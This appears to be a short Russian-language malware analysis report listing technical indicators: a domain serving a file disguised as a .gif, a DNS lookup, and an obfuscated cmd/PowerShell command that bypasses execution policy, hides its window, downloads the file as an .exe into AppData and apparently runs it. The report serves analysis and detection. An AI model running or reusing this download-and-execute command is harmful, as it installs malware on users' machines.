Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowERsHell.EXE -eXeCUTiOnpOLICy BYpASs -NoProfIlE -WINDOWstyLE hiDDEn (NEW-ObJeCT sYstEM.NeT.wEBClienT).downLOaDFIlE('http://www.basopoew.top/read.php?f=1.gif','%aPpdAta%.EXe');STa...
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /C "PowERsHell.EXE -eXeCUTiOnpOLICy BYpASs -NoProfIlE -WINDOWstyLE hiDDEn (NEW-ObJeCT sYstEM.NeT.wEBClienT).downLOaDFIlE('http://www.basopoew.top/read.php?f=1.gif','%aPpdAta%.EXe');STa...' (со скрытым окном)